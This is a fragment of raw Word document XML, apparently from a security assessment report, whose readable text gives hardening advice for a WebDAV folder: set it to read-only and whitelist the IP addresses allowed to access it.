          <w:numId w:val="6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before="0" w:line="276" w:lineRule="auto"/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0" w:line="276" w:lineRule="auto"/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1"/>
        </w:numPr>
        <w:spacing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System Hardening</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000007E">
      <w:pPr>
        <w:spacing w:before="0" w:line="276" w:lineRule="auto"/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6"/>
        </w:numPr>
        <w:spacing w:before="0" w:line="276" w:lineRule="auto"/>
        <w:ind w:left="144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mitigate the attack, permissions on the folder itself can be changed to read only so this prevents any malicious files being uploaded to the folder.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000080">
      <w:pPr>
        <w:spacing w:before="0" w:line="276" w:lineRule="auto"/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6"/>
        </w:numPr>
        <w:spacing w:before="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whitelist IP addresses that can access the webdav folder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0" w:line="276" w:lineRule="auto"/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0" w:line="276" w:lineRule="auto"/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0"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footerReference r:id="rId30" w:type="first"/>
      <w:footerReference r:id="rId31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libri"/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7.png"/>
          <a:graphic>
            <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
              <pic:pic>
                <pic:nvPicPr>
                  <pic:cNvPr descr="horizontal line"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21" name="image6.png"/>
          <a:graphic>
            <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
              <pic:pic>
                <pic:nvPicPr>
                  <pic:cNvPr descr="horizontal line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B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3"/>
    <w:bookmarkEnd w:id="13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2"/>
    <w:bookmarkEnd w:id="12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8" name="image8.png"/>
          <a:graphic>
            <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
              <pic:pic>
                <pic:nvPicPr>
                  <pic:cNvPr descr="horizontal line"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3.png"/><Relationship Id="rId21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9.png"/><Relationship Id="rId25" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image2.png"/><Relationship Id="rId28" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/header" Target="header1.xml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eader" Target="header2.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image20.jpg"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image5.png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15.png"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image10.png"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image12.png"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image4.png"/><Relationship Id="rId15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image21.png"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image23.png"/><Relationship Id="rId17" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://crackstation.net/" TargetMode="External"/><Relationship Id="rId16" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image18.png"/><Relationship Id="rId19" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image17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